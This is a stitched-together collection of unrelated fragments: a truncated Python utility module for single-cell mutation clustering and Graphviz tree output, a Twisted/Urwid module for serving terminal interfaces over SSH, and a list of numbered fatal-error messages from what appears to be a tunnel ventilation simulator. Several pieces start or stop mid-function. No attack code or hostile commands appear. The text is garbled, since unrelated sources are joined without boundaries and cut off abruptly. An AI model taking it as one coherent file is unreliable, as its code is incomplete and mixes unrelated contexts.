result["source"] = str(zlib.decompress(base64.b64decode(result["source"])), "utf-8")
# append error code in string format
if "error" in result:
result["error_string"] = | |
<filename>libs/utils.py
#!/usr/bin/env python3
import os
import re
import numpy as np
import bottleneck as bn
import pandas as pd
from scipy.special import gamma, binom
from scipy.stats import chi2
from scipy.spatial.distance import pdist, squareform
from sklearn.metrics import adjusted_rand_score
from sklearn.metrics.cluster import v_measure_score
from sklearn.cluster import AgglomerativeClustering
EPSILON = np.finfo(np.float64).resolution
log_EPSILON = np.log(EPSILON)
DOT_HEADER = 'digraph G {\n' \
'node [width=0.75 fillcolor="#a6cee3", style=filled, fontcolor=black, ' \
'shape=circle, fontsize=20, fontname="arial", fixedsize=True];\n' \
DOT_CELLS = 'node [width=0.5, fillcolor="#e8bdc9", fontcolor=black, ' \
'style=filled, shape=square, fontsize=8, fontname="arial", fixedsize=True];\n'
# ------------------------------------------------------------------------------
# Mathematical functions
# ------------------------------------------------------------------------------
def check_beta_params(mean, var):
''' Check if parameters can be used for a beta function
Arguments:
mean (float): Beta function mean
var (float): Beta function variance
Returns:
bool: True if parameters can be used, False otherwise
'''
return mean > .5 * (1 - (1 - 4 * var) ** .5)
# ------------------------------------------------------------------------------
# Evaluation functions
# ------------------------------------------------------------------------------
def get_v_measure(pred_clusters, true_clusters, out_file=''):
score = v_measure_score(true_clusters, pred_clusters)
if out_file:
_write_to_file(out_file, score)
return score
def get_ARI(pred_clusters, true_clusters, out_file=''):
score = adjusted_rand_score(true_clusters,pred_clusters)
if out_file:
_write_to_file(out_file, score)
return score
def get_hamming_dist(df_pred, df_true):
if df_true.shape != df_pred.shape:
score = np.count_nonzero(df_pred.round() != df_true.T)
else:
score = np.count_nonzero(df_pred.round() != df_true)
# To catch caes where NxN dataframes got mixed up
score_t = np.count_nonzero(df_pred.round() != df_true.T)
if score_t < score:
score = score_t
return score
def _get_genotype_all(df_in, assign):
df_out = pd.DataFrame(
index=np.arange(df_in.shape[0]), columns=np.arange(len(assign))
)
if df_in.shape == df_out.shape:
return df_in
for cell_id, cl_id in enumerate(assign):
if isinstance(cl_id, tuple):
df_out[cell_id] = df_in[list(cl_id)].max(axis=1)
else:
df_out[cell_id] = df_in[cl_id]
return df_out
def get_dist(assignments):
steps, cells = assignments.shape
dist = np.zeros(np.arange(cells).sum(), dtype=np.int32)
# Sum up Hamming distance between cells for each spoterior sample
for assign in assignments:
dist += pdist(np.stack([assign, assign]).T, 'hamming').astype(np.int32)
# Return mean posterior cellwise hamming distance
return dist / steps
def _get_MPEAR(assignments):
dist = get_dist(assignments)
sim = 1 - dist
dist = squareform(dist)
avg_cl_no = np.mean([np.unique(i).size for i in assignments])
n_range = np.arange(max(2, avg_cl_no * 0.2),
min(avg_cl_no * 2.5, assignments.shape[1]), dtype=int)
best_MPEAR = -np.inf
best_assignment = None
for n in n_range:
model = AgglomerativeClustering(
affinity='precomputed', n_clusters=n, linkage='complete'
).fit(dist)
score = _calc_MPEAR(sim, model.labels_)
if score > best_MPEAR:
best_assignment = model.labels_
best_MPEAR = score
return best_assignment
def _calc_MPEAR(pi, c):
# <NAME>., <NAME>. (2009) - Eq. 13
I = 1 - pdist(np.stack([c, c]).T, 'hamming')
I_sum = I.sum()
pi_sum = pi.sum()
index = (I * pi).sum()
expected_index = (I_sum * pi_sum) / binom(c.size, 2)
max_index = .5 * (I_sum + pi_sum)
return (index - expected_index) / (max_index - expected_index)
def get_mean_hierarchy_assignment(assignments, params_full):
steps = assignments.shape[0]
assign = _get_MPEAR(assignments)
clusters = np.unique(assign)
params = np.zeros((clusters.size, params_full.shape[2]))
for i, cluster in enumerate(clusters):
cells_cl_idx = assign == cluster
cells = np.nonzero(cells_cl_idx)[0]
other = np.nonzero(~cells_cl_idx)[0]
# Paper - section 2.3: first criteria
if cells.size == 1:
same_cluster = np.ones(steps).astype(bool)
else:
same_cluster = 0 == bn.nansum(
bn.move_std(assignments[:, cells], 2, axis=1), axis=1
)
# Paper - section 2.3: second criteria
cl_ids = assignments[:,cells[0]]
other_cl_id = assignments[:,other]
no_others = [cl_ids[j] not in other_cl_id[j] for j in range(steps)]
# At least criteria 1 fullfilled
if any(same_cluster):
# Both criteria fullfilled in at least 1 posterior sample
if any(same_cluster & no_others):
step_idx = np.argwhere(same_cluster & no_others).flatten()
else:
step_idx = np.argwhere(same_cluster).flatten()
for step in step_idx:
cl_id = np.argwhere(np.unique(assignments[step]) == cl_ids[step]) \
.flatten()[0]
params[i] += params_full[step][cl_id]
params[i] /= step_idx.size
# If not, take parameters from all posterior samples
else:
for step, step_assign in enumerate(assignments):
cl_id_all = np.unique(step_assign)
cl_id, cnt = np.unique(step_assign[cells], return_counts=True)
cl_id_new = np.argwhere(np.in1d(cl_id_all, cl_id)).flatten()
params[i] += np.dot(cnt, params_full[step][cl_id_new])
params[i] /= steps * cells.size
params_df = pd.DataFrame(params).T[assign]
return assign, params_df
def get_latents_posterior(results, data, single_chains=False):
latents = []
if single_chains:
for result in results:
latents.append(_get_latents_posterior_chain(result, data))
else:
result = _concat_chain_results(results)
latents.append(_get_latents_posterior_chain(result, data))
return latents
def _concat_chain_results(results):
assign = np.concatenate([i['assignments'][i['burn_in']:] for i in results])
a = np.concatenate([i['DP_alpha'][i['burn_in']:] for i in results])
ML = np.concatenate([i['ML'][i['burn_in']:] for i in results])
MAP = np.concatenate([i['MAP'][i['burn_in']:] for i in results])
FN = np.concatenate([i['FN'][i['burn_in']:] for i in results])
FP = np.concatenate([i['FP'][i['burn_in']:] for i in results])
# Fill clusters not used by all chains with zeros
params = [i['params'] for i in results]
cl_max = np.max([i.shape[1] for i in params])
for i, par_chain in enumerate(params):
cl_diff = cl_max - par_chain.shape[1]
params[i] = np.pad(par_chain, [(0, 0), (0, cl_diff), (0, 0)])
par = np.concatenate(params)
return {'assignments': assign, 'params': par, 'DP_alpha': a, 'FN': FN,
'FP': FP, 'burn_in': 0, 'ML': ML, 'MAP': MAP}
def _get_latents_posterior_chain(result, data):
burn_in = result['burn_in']
assign, geno = get_mean_hierarchy_assignment(
result['assignments'][burn_in:], result['params']
)
a = _get_posterior_avg(result['DP_alpha'][burn_in:])
FN = _get_posterior_avg(result['FN'][burn_in:])
FP = _get_posterior_avg(result['FP'][burn_in:])
FN_geno = ((geno.T.values.round() == 1) & (data == 0)).sum() \
/ geno.values.round().sum()
FP_geno = ((geno.T.values.round() == 0) & (data == 1)).sum() \
/ (1 - geno.values.round()).sum()
return {'a': a, 'assignment': assign, 'genotypes': geno, 'FN': FN, 'FP': FP,
'FN_geno': FN_geno, 'FP_geno': FP_geno}
def _get_posterior_avg(data):
return np.mean(data), np.std(data)
def get_latents_point(results, est, data, single_chains=False):
latents = []
if single_chains:
for result in results:
latents.append(_get_latents_point_chain(result, est, data))
else:
scores = [np.max(i[est][i['burn_in']:]) for i in results]
best_chain = results[np.argmax(scores)]
latents.append(_get_latents_point_chain(best_chain, est, data))
return latents
def _get_latents_point_chain(result, est, data):
step_no_bi = np.argmax(result[est][result['burn_in']:])
step = step_no_bi + result['burn_in']
# DPMM conc. parameter
a = result['DP_alpha'][step]
FP = result['FP'][step]
FN = result['FN'][step]
assignment = result['assignments'][step].tolist()
cl_names = np.unique(assignment)
geno_all = result['params'][step_no_bi][np.arange(cl_names.size)] # step_no_bi + 1
geno = pd.DataFrame(geno_all, index=cl_names).T[assignment]
FN_geno = ((geno.T.values.round() == 1) & (data == 0)).sum() \
/ geno.values.round().sum()
FP_geno = ((geno.T.values.round() == 0) & (data == 1)).sum() \
/ (1 - geno.values.round()).sum()
return {'step': step, 'a': a, 'assignment': assignment, 'genotypes': geno,
'FN': FN, 'FP': FP, 'FN_geno': FN_geno, 'FP_geno': FP_geno}
def _write_to_file(file, content, attach=False):
if attach and os.path.exists(file):
open_flag = 'a'
else:
open_flag = 'w'
with open(file, open_flag) as f:
f.write(str(content))
def newick_to_gv(in_file, out_file=''):
with open(in_file, 'r') as f:
tree = f.read().strip().rstrip(';')
edges, cells = get_edges_from_newick(tree)
gv_tree = edges_to_gv(edges, cells)
if out_file:
_write_to_file(out_file, gv_tree)
else:
return gv_tree
def get_edges_from_newick(data):
cells = sorted(re.findall('\w+cell\d*', data))
for i, cell in enumerate(cells):
data = data.replace(cell, f'C{i}')
edges = []
node_no = len(cells)
while True:
pairs = re.findall('\((C\d+):(0.\d+),(C\d+):(0.\d+)\)', data)
if not pairs:
break
for i, pair in enumerate(pairs):
n1, d1, n2, d2 = pair
edges.append((node_no, int(n1.lstrip('C')), float(d1)))
edges.append((node_no, int(n2.lstrip('C')), float(d2)))
data = data.replace('({}:{},{}:{})'.format(*pair), f'C{node_no}')
node_no += 1
return edges, cells
def get_edges_from_gz(data):
mut_edges = []
muts = set([])
cell_edges = []
cells = []
for line in data.split(';\n')[1:-1]:
edge_nodes = re.search('(\d+)\s+->\s+(\d+)', line)
attachment_nodes = re.search('(\d+)\s+->\s+(s\d+)', line)
single_node = re.search('(s?\d+)$', line)
if edge_nodes:
n_from = int(edge_nodes.group(1))
n_to = int(edge_nodes.group(2))
n_from -= 1
n_to -= 1
if n_from != -1 and n_to != -1:
mut_edges.append((n_from, n_to))
muts.update([n_from, n_to])
if attachment_nodes:
n_from = int(attachment_nodes.group(1))
n_to = attachment_nodes.group(2)
n_from -= 1
cell_edges.append((n_from, n_to))
cells.append(n_to)
elif single_node:
node = single_node.group(1)
if node.startswith('s'):
cells.append(cells)
else:
muts.add(int(node) - 1)
return mut_edges, muts, cell_edges, cells
def edges_to_gv(edges, cells):
# GraphViy Header: Node style
out_str = DOT_HEADER
e_length = [i[2] for i in edges]
e_scaled = np.ceil(e_length / np.max(e_length) * (100)).astype(int)
for i, edge in enumerate(edges):
try:
n_to = cells[edge[1]]
except IndexError:
n_to = edge[1]
out_str += '{} -> {} [label="{}"];\n' \
.format(edge[0], n_to, ' ' * e_scaled[i])
out_str += '}'
return out_str
def collapse_cells_on_tree(data_folder, out_file=''):
tree_file = os.path.join(data_folder, 'tree.gv')
with open(tree_file, 'r') as f:
tree_str = f.read()
mut_edges, muts, cell_edges, cells = get_edges_from_gz(tree_str)
cell_edges_collapse = {}
for mut_from, cell_to in cell_edges:
try:
cell_edges_collapse[mut_from].append(cell_to)
except KeyError:
cell_edges_collapse[mut_from] = [cell_to]
# GraphViy Header: Node style
out_str = DOT_HEADER
for mut_edge in mut_edges:
out_str += '{} -> {};\n'.format(*mut_edge)
out_str += DOT_CELLS
i = 0
for mut_from, cells_to in cell_edges_collapse.items():
size = 0.5 + len(cells_to) * 1
out_str += '{f} -> s{t} [label="{s}", size={s}];\n' \
.format(f=mut_from, t=i, s=size)
i += 1
out_str += '}'
if not out_file:
out_file = os.path.join(data_folder, 'tree_collapsed.gv')
_write_to_file(out_file, out_str)
try:
from graphviz import render
render('dot', 'png', out_file)
except ImportError:
pass
def get_lugsail_batch_means_est(data_in, steps=None):
m = len(data_in)
T_iL = []
s_i = []
n_i = []
for data_chain, burnin_chain in data_in:
data = data_chain[burnin_chain:steps]
if data.size < 9: # otherwise b // 3 == 0
return np.inf
# [chapter 2.2 in Vats and Knudson, 2018]
n_ii = data.size
b = int(n_ii ** (1/2)) # Batch size. Alternative: n ** (1/3)
n_i.append(n_ii)
chain_mean = bn.nanmean(data)
T_iL.append(
2 * get_tau_lugsail(b, data, chain_mean) \
- get_tau_lugsail(b // 3, data, chain_mean)
)
| |
"""
Twisted integration for Urwid.
This module allows you to serve Urwid applications remotely over ssh.
The idea is that the server listens as an SSH server, and each connection is
routed by Twisted to urwid, and the urwid UI is routed back to the console.
The concept was a bit of a head-bender for me, but really we are just sending
escape codes and the what-not back to the console over the shell that ssh has
created. This is the same service as provided by the UI components in
twisted.conch.insults.window, except urwid has more features, and seems more
mature.
This module is not highly configurable, and the API is not great, so
don't worry about just using it as an example and copy-pasting.
Process
-------
TODO:
- better gpm tracking: there is no place for os.Popen in a Twisted app I
think.
Copyright: 2010, <NAME> <<EMAIL>>
License: MIT <http://www.opensource.org/licenses/mit-license.php>
Portions Copyright: 2010, <NAME> <<EMAIL>>
Licence: LGPL <http://opensource.org/licenses/lgpl-2.1.php>
"""
from __future__ import print_function
import os
import urwid
from urwid.raw_display import Screen
from zope.interface import Interface, Attribute, implements
from twisted.application.service import Application
from twisted.application.internet import TCPServer
from twisted.cred.portal import Portal
from twisted.conch.interfaces import IConchUser, ISession
from twisted.conch.insults.insults import TerminalProtocol, ServerProtocol
from twisted.conch.manhole_ssh import (ConchFactory, TerminalRealm,
TerminalUser, TerminalSession, TerminalSessionTransport)
from twisted.python.components import Componentized, Adapter
class IUrwidUi(Interface):
"""Toplevel urwid widget
"""
toplevel = Attribute('Urwid Toplevel Widget')
palette = Attribute('Urwid Palette')
screen = Attribute('Urwid Screen')
loop = Attribute('Urwid Main Loop')
def create_urwid_toplevel():
"""Create a toplevel widget.
"""
def create_urwid_mainloop():
"""Create the urwid main loop.
"""
class IUrwidMind(Interface):
ui = Attribute('')
terminalProtocol = Attribute('')
terminal = Attribute('')
checkers = Attribute('')
avatar = Attribute('The avatar')
def push(data):
"""Push data"""
def draw():
"""Refresh the UI"""
class UrwidUi(object):
def __init__(self, urwid_mind):
self.mind = urwid_mind
self.toplevel = self.create_urwid_toplevel()
self.palette = self.create_urwid_palette()
self.screen = TwistedScreen(self.mind.terminalProtocol)
self.loop = self.create_urwid_mainloop()
def create_urwid_toplevel(self):
raise NotImplementedError
def create_urwid_palette(self):
return
def create_urwid_mainloop(self):
evl = urwid.TwistedEventLoop(manage_reactor=False)
loop = urwid.MainLoop(self.toplevel, screen=self.screen,
event_loop=evl,
unhandled_input=self.mind.unhandled_key,
palette=self.palette)
self.screen.loop = loop
loop.run()
return loop
class UnhandledKeyHandler(object):
def __init__(self, mind):
self.mind = mind
def push(self, key):
if isinstance(key, tuple):
pass
else:
f = getattr(self, 'key_%s' % key.replace(' ', '_'), None)
if f is None:
return
else:
return f(key)
def key_ctrl_c(self, key):
self.mind.terminal.loseConnection()
class UrwidMind(Adapter):
implements(IUrwidMind)
cred_checkers = []
ui = None
ui_factory = None
unhandled_key_factory = UnhandledKeyHandler
@property
def avatar(self):
return IConchUser(self.original)
def set_terminalProtocol(self, terminalProtocol):
self.terminalProtocol = terminalProtocol
self.terminal = terminalProtocol.terminal
self.unhandled_key_handler = self.unhandled_key_factory(self)
self.unhandled_key = self.unhandled_key_handler.push
self.ui = self.ui_factory(self)
def push(self, data):
self.ui.screen.push(data)
def draw(self):
self.ui.loop.draw_screen()
class TwistedScreen(Screen):
"""A Urwid screen which knows about the Twisted terminal protocol that is
driving it.
A Urwid screen is responsible for:
1. Input
2. Output
Input is achieved in normal urwid by passing a list of available readable
file descriptors to the event loop for polling/selecting etc. In the
Twisted situation, this is not necessary because Twisted polls the input
descriptors itself. Urwid allows this by being driven using the main loop
instance's `process_input` method which is triggered on Twisted protocol's
standard `dataReceived` method.
"""
def __init__(self, terminalProtocol):
# We will need these later
self.terminalProtocol = terminalProtocol
self.terminal = terminalProtocol.terminal
Screen.__init__(self)
self.colors = 16
self._pal_escape = {}
self.bright_is_bold = True
self.register_palette_entry(None, 'black', 'white')
urwid.signals.connect_signal(self, urwid.UPDATE_PALETTE_ENTRY,
self._on_update_palette_entry)
# Don't need to wait for anything to start
self._started = True
# Urwid Screen API
def get_cols_rows(self):
"""Get the size of the terminal as (cols, rows)
"""
return self.terminalProtocol.width, self.terminalProtocol.height
def draw_screen(self, maxres, r ):
"""Render a canvas to the terminal.
The canvas contains all the information required to render the Urwid
UI. The content method returns a list of rows as (attr, cs, text)
tuples. This very simple implementation iterates each row and simply
writes it out.
"""
(maxcol, maxrow) = maxres
#self.terminal.eraseDisplay()
lasta = None
for i, row in enumerate(r.content()):
self.terminal.cursorPosition(0, i)
for (attr, cs, text) in row:
if attr != lasta:
text = '%s%s' % (self._attr_to_escape(attr), text)
lasta = attr
#if cs or attr:
# print cs, attr
self.write(text)
cursor = r.get_cursor()
if cursor is not None:
self.terminal.cursorPosition(*cursor)
# XXX from base screen
def set_mouse_tracking(self, enable=True):
"""
Enable (or disable) mouse tracking.
After calling this function get_input will include mouse
click events along with keystrokes.
"""
if enable:
self.write(urwid.escape.MOUSE_TRACKING_ON)
else:
self.write(urwid.escape.MOUSE_TRACKING_OFF)
# twisted handles polling, so we don't need the loop to do it, we just
# push what we get to the loop from dataReceived.
def hook_event_loop(self, event_loop, callback):
self._urwid_callback = callback
self._evl = event_loop
def unhook_event_loop(self, event_loop):
pass
# Do nothing here either. Not entirely sure when it gets called.
def get_input(self, raw_keys=False):
return
def get_available_raw_input(self):
data = self._data
self._data = []
return data
# Twisted driven
def push(self, data):
"""Receive data from Twisted and push it into the urwid main loop.
We must here:
1. filter the input data against urwid's input filter.
2. Calculate escapes and other clever things using urwid's
`escape.process_keyqueue`.
3. Pass the calculated keys as a list to the Urwid main loop.
4. Redraw the screen
"""
self._data = list(map(ord, data))
self.parse_input(self._evl, self._urwid_callback)
self.loop.draw_screen()
# Convenience
def write(self, data):
self.terminal.write(data)
# Private
def _on_update_palette_entry(self, name, *attrspecs):
# copy the attribute to a dictionary containing the escape sequences
self._pal_escape[name] = self._attrspec_to_escape(
attrspecs[{16:0,1:1,88:2,256:3}[self.colors]])
def _attr_to_escape(self, a):
if a in self._pal_escape:
return self._pal_escape[a]
elif isinstance(a, urwid.AttrSpec):
return self._attrspec_to_escape(a)
# undefined attributes use default/default
# TODO: track and report these
return self._attrspec_to_escape(
urwid.AttrSpec('default','default'))
def _attrspec_to_escape(self, a):
"""
Convert AttrSpec instance a to an escape sequence for the terminal
>>> s = Screen()
>>> s.set_terminal_properties(colors=256)
>>> a2e = s._attrspec_to_escape
>>> a2e(s.AttrSpec('brown', 'dark green'))
'\\x1b[0;33;42m'
>>> a2e(s.AttrSpec('#fea,underline', '#d0d'))
'\\x1b[0;38;5;229;4;48;5;164m'
"""
if a.foreground_high:
fg = "38;5;%d" % a.foreground_number
elif a.foreground_basic:
if a.foreground_number > 7:
if self.bright_is_bold:
fg = "1;%d" % (a.foreground_number - 8 + 30)
else:
fg = "%d" % (a.foreground_number - 8 + 90)
else:
fg = "%d" % (a.foreground_number + 30)
else:
fg = "39"
st = "1;" * a.bold + "4;" * a.underline + "7;" * a.standout
if a.background_high:
bg = "48;5;%d" % a.background_number
elif a.background_basic:
if a.background_number > 7:
# this doesn't work on most terminals
bg = "%d" % (a.background_number - 8 + 100)
else:
bg = "%d" % (a.background_number + 40)
else:
bg = "49"
return urwid.escape.ESC + "[0;%s;%s%sm" % (fg, st, bg)
class UrwidTerminalProtocol(TerminalProtocol):
"""A terminal protocol that knows to proxy input and receive output from
Urwid.
This integrates with the TwistedScreen in a 1:1.
"""
def __init__(self, urwid_mind):
self.urwid_mind = urwid_mind
self.width = 80
self.height = 24
def connectionMade(self):
self.urwid_mind.set_terminalProtocol(self)
self.terminalSize(self.height, self.width)
def terminalSize(self, height, width):
"""Resize the terminal.
"""
self.width = width
self.height = height
self.urwid_mind.ui.loop.screen_size = None
self.terminal.eraseDisplay()
self.urwid_mind.draw()
def dataReceived(self, data):
"""Received data from the connection.
This overrides the default implementation which parses and passes to
the keyReceived method. We don't do that here, and must not do that so
that Urwid can get the right juice (which includes things like mouse
tracking).
Instead we just pass the data to the screen instance's dataReceived,
which handles the proxying to Urwid.
"""
self.urwid_mind.push(data)
def _unhandled_input(self, input):
# evil
proceed = True
if hasattr(self.urwid_toplevel, 'app'):
proceed = self.urwid_toplevel.app.unhandled_input(self, input)
if not proceed:
return
if input == 'ctrl c':
self.terminal.loseConnection()
class UrwidServerProtocol(ServerProtocol):
def dataReceived(self, data):
self.terminalProtocol.dataReceived(data)
class UrwidUser(TerminalUser):
"""A terminal user that remembers its avatarId
The default implementation doesn't
"""
def __init__(self, original, avatarId):
TerminalUser.__init__(self, original, avatarId)
self.avatarId = avatarId
class UrwidTerminalSession(TerminalSession):
"""A terminal session that remembers the avatar and chained protocol for
later use. And implements a missing method for changed Window size.
Note: This implementation assumes that each SSH connection will only
request a single shell, which is not an entirely safe assumption, but is
by far the most common case.
"""
def openShell(self, proto):
"""Open a shell.
"""
self.chained_protocol = UrwidServerProtocol(
UrwidTerminalProtocol, IUrwidMind(self.original))
TerminalSessionTransport(
proto, self.chained_protocol,
IConchUser(self.original),
self.height, self.width)
def windowChanged(self, dimensions):
"""Called when the window size has changed.
"""
(h, w, x, y) = dimensions
self.chained_protocol.terminalProtocol.terminalSize(h, w)
class UrwidRealm(TerminalRealm):
"""Custom terminal realm class-configured to use our custom Terminal User
Terminal Session.
"""
def __init__(self, mind_factory):
self.mind_factory = mind_factory
def _getAvatar(self, avatarId):
comp = Componentized()
user = UrwidUser(comp, avatarId)
comp.setComponent(IConchUser, user)
sess = UrwidTerminalSession(comp)
comp.setComponent(ISession, sess)
| |
THERMAL SUB-NODES IN THIS SYSTEM HAS EXCEEDED 600.
THIS FATAL ERROR PREVENTS FURTHER INTERPRETATION OF THIS SYSTEM INPUT FILE.
SOME FATAL ERRORS MAY BE CORRECTED BY EITHER CHANGING THE NUMBER OF ITEMS INPUT OR CHANGING THE PROGRAM
ARRAY SIZES. PLEASE SEE DISCUSSIONS IN BOTH THE 'ERROR MESSAGES' PORTION OF THE USER'S MANUAL AND THE
PORTION OF THE PROGRAMMER'S GUIDE IN THE PROGRAMMER'S MANUAL DEALING WITH ARRAY SIZE ADJUSTMENT.
*ERROR* TYPE 180 ********************************************************************************
TRAIN ROUTES MAY NOT PASS THROUGH VENT SHAFTS.
THIS FATAL ERROR PREVENTS FURTHER INTERPRETATION OF THIS SYSTEM INPUT FILE.
SOME FATAL ERRORS MAY BE CORRECTED BY EITHER CHANGING THE NUMBER OF ITEMS INPUT OR CHANGING THE PROGRAM
ARRAY SIZES. PLEASE SEE DISCUSSIONS IN BOTH THE 'ERROR MESSAGES' PORTION OF THE USER'S MANUAL AND THE
PORTION OF THE PROGRAMMER'S GUIDE IN THE PROGRAMMER'S MANUAL DEALING WITH ARRAY SIZE ADJUSTMENT.
*ERROR* TYPE 181 ********************************************************************************
THIS SECTION IS NOT CONNECTED TO THIS NODE.
THIS FATAL ERROR PREVENTS FURTHER INTERPRETATION OF THIS SYSTEM INPUT FILE.
SOME FATAL ERRORS MAY BE CORRECTED BY EITHER CHANGING THE NUMBER OF ITEMS INPUT OR CHANGING THE PROGRAM
ARRAY SIZES. PLEASE SEE DISCUSSIONS IN BOTH THE 'ERROR MESSAGES' PORTION OF THE USER'S MANUAL AND THE
PORTION OF THE PROGRAMMER'S GUIDE IN THE PROGRAMMER'S MANUAL DEALING WITH ARRAY SIZE ADJUSTMENT.
*ERROR* TYPE 182 ********************************************************************************
THE NUMBER OF SECTIONS ATTACHED TO THIS NODE IS INCONSISTENT WITH
THE SYSTEM GEOMETRY DATA.
THIS FATAL ERROR PREVENTS FURTHER INTERPRETATION OF THIS SYSTEM INPUT FILE.
SOME FATAL ERRORS MAY BE CORRECTED BY EITHER CHANGING THE NUMBER OF ITEMS INPUT OR CHANGING THE PROGRAM
ARRAY SIZES. PLEASE SEE DISCUSSIONS IN BOTH THE 'ERROR MESSAGES' PORTION OF THE USER'S MANUAL AND THE
PORTION OF THE PROGRAMMER'S GUIDE IN THE PROGRAMMER'S MANUAL DEALING WITH ARRAY SIZE ADJUSTMENT.
*ERROR* TYPE 183 ********************************************************************************
THE ABOVE NODE HAS NOT BEEN DESCRIBED IN THE NODE DATA.
THIS FATAL ERROR PREVENTS FURTHER INTERPRETATION OF THIS SYSTEM INPUT FILE.
SOME FATAL ERRORS MAY BE CORRECTED BY EITHER CHANGING THE NUMBER OF ITEMS INPUT OR CHANGING THE PROGRAM
ARRAY SIZES. PLEASE SEE DISCUSSIONS IN BOTH THE 'ERROR MESSAGES' PORTION OF THE USER'S MANUAL AND THE
PORTION OF THE PROGRAMMER'S GUIDE IN THE PROGRAMMER'S MANUAL DEALING WITH ARRAY SIZE ADJUSTMENT.
*ERROR* TYPE 184 ********************************************************************************
A MIXING NODE MUST HAVE TWO OR MORE SECTIONS CONNECTED TO IT.
*ERROR* TYPE 185 ********************************************************************************
THE ZONE TYPE MUST BE EITHER 1, 2, OR 3.
*ERROR* TYPE 186 ********************************************************************************
THE ALLOWABLE NUMBER OF SIMULATION ERRORS IS LESS THAN 0 OR GREATER THAN 50.
THIS FATAL ERROR PREVENTS FURTHER INTERPRETATION OF THIS SYSTEM INPUT FILE.
SOME FATAL ERRORS MAY BE CORRECTED BY EITHER CHANGING THE NUMBER OF ITEMS INPUT OR CHANGING THE PROGRAM
ARRAY SIZES. PLEASE SEE DISCUSSIONS IN BOTH THE 'ERROR MESSAGES' PORTION OF THE USER'S MANUAL AND THE
PORTION OF THE PROGRAMMER'S GUIDE IN THE PROGRAMMER'S MANUAL DEALING WITH ARRAY SIZE ADJUSTMENT.
*ERROR* TYPE 187 ********************************************************************************
THE AIR DENSITY GIVEN WITH THE FAN PERFORMANCE CURVE DATA POINTS IS EITHER LESS THAN 0.040 OR
GREATER THAN 0.085 LBS/CUFT.
*ERROR* TYPE 188 ********************************************************************************
THE NUMBER OF ELEMENTS IN THE AERODYNAMIC 'DQ/DT' MATRIX IS GREATER THAN THE PROGRAM CAPACITY.
THIS FATAL ERROR PREVENTS FURTHER INTERPRETATION OF THIS SYSTEM INPUT FILE.
SOME FATAL ERRORS MAY BE CORRECTED BY EITHER CHANGING THE NUMBER OF ITEMS INPUT OR CHANGING THE PROGRAM
ARRAY SIZES. PLEASE SEE DISCUSSIONS IN BOTH THE 'ERROR MESSAGES' PORTION OF THE USER'S MANUAL AND THE
PORTION OF THE PROGRAMMER'S GUIDE IN THE PROGRAMMER'S MANUAL DEALING WITH ARRAY SIZE ADJUSTMENT.
*ERROR* TYPE 189 ********************************************************************************
A SYSTEM WHICH CONTAINS TWO OR MORE INDEPENDENT NETWORKS HAS BEEN ENTERED ('FRAGMENTED NETWORK').
THIS FATAL ERROR PREVENTS FURTHER INTERPRETATION OF THIS SYSTEM INPUT FILE.
SOME FATAL ERRORS MAY BE CORRECTED BY EITHER CHANGING THE NUMBER OF ITEMS INPUT OR CHANGING THE PROGRAM
ARRAY SIZES. PLEASE SEE DISCUSSIONS IN BOTH THE 'ERROR MESSAGES' PORTION OF THE USER'S MANUAL AND THE
PORTION OF THE PROGRAMMER'S GUIDE IN THE PROGRAMMER'S MANUAL DEALING WITH ARRAY SIZE ADJUSTMENT.
*ERROR* TYPE 190 ********************************************************************************
THE TOTAL LENGTH OF THIS VENTILATION SHAFT IS LESS THAN 10 OR GREATER THAN 2000 FEET.
*ERROR* TYPE 191 ********************************************************************************
A NON-INERTIAL (TYPE 3) ZONE IS NOT CONNECTED TO AN UNCONTROLLED (TYPE 2) ZONE.
*ERROR* TYPE 192 ********************************************************************************
THE AMPLITUDE OF THE ANNUAL TEMPERATURE FLUCTUATION IS LESS THAN 0 OR GREATER THAN 50 DEG F.
*ERROR* TYPE 193 ********************************************************************************
THE FAN LOWER FLOW LIMIT (POINT OF MOTOR BREAKDOWN TORQUE OR STOPPING) ENTERED IS EITHER LESS THAN
-100,000 CFM OR GREATER THAN 0 CFM.
*ERROR* TYPE 194 ********************************************************************************
THE FAN UPPER FLOW LIMIT (POINT OF WINDMILLING) IS EITHER LESS THAN 1000 CFM OR GREATER THAN 2,000,000 CFM.
*ERROR* TYPE 195 ********************************************************************************
A NON-INERTIA VENT SHAFT ZONE (TYPE 3) MUST NOT CONTAIN A LINE SEGMENT.
*ERROR* TYPE 196 ********************************************************************************
A SECTION HAS BEEN ENTERED THAT IS ISOLATED FROM ALL OTHER SECTIONS IN THE NETWORK.
THIS FATAL ERROR PREVENTS FURTHER INTERPRETATION OF THIS SYSTEM INPUT FILE.
SOME FATAL ERRORS MAY BE CORRECTED BY EITHER CHANGING THE NUMBER OF ITEMS INPUT OR CHANGING THE PROGRAM
ARRAY SIZES. PLEASE SEE DISCUSSIONS IN BOTH THE 'ERROR MESSAGES' PORTION OF THE USER'S MANUAL AND THE
PORTION OF THE PROGRAMMER'S GUIDE IN THE PROGRAMMER'S MANUAL DEALING WITH ARRAY SIZE ADJUSTMENT.
*ERROR* TYPE 197 ********************************************************************************
A NETWORK HAVING ONLY ONE OPENING TO THE ATMOSPHERE HAS BEEN DEFINED.
THIS FATAL ERROR PREVENTS FURTHER INTERPRETATION OF THIS SYSTEM INPUT FILE.
SOME FATAL ERRORS MAY BE CORRECTED BY EITHER CHANGING THE NUMBER OF ITEMS INPUT OR CHANGING THE PROGRAM
ARRAY SIZES. PLEASE SEE DISCUSSIONS IN BOTH THE 'ERROR MESSAGES' PORTION OF THE USER'S MANUAL AND THE
PORTION OF THE PROGRAMMER'S GUIDE IN THE PROGRAMMER'S MANUAL DEALING WITH ARRAY SIZE ADJUSTMENT.
*ERROR* TYPE 198 ********************************************************************************
A THERMODYNAMIC TYPE 2 (NON-MIXING) NODE MUST BE AT A 4 OR 5 BRANCH NODE ONLY.
*ERROR* TYPE 199 ********************************************************************************
THE NUMBER OF LOOPS DEFINED BY THE GEOMETRY IS GREATER THAN 500.
THIS FATAL ERROR PREVENTS FURTHER INTERPRETATION OF THIS SYSTEM INPUT FILE.
SOME FATAL ERRORS MAY BE CORRECTED BY EITHER CHANGING THE NUMBER OF ITEMS INPUT OR CHANGING THE PROGRAM
ARRAY SIZES. PLEASE SEE DISCUSSIONS IN BOTH THE 'ERROR MESSAGES' PORTION OF THE USER'S MANUAL AND THE
PORTION OF THE PROGRAMMER'S GUIDE IN THE PROGRAMMER'S MANUAL DEALING WITH ARRAY SIZE ADJUSTMENT.
*ERROR* TYPE 200 ********************************************************************************
THE AVERAGE NUMBER OF SECTIONS ALLOWED PER LOOP HAS BEEN EXCEEDED.
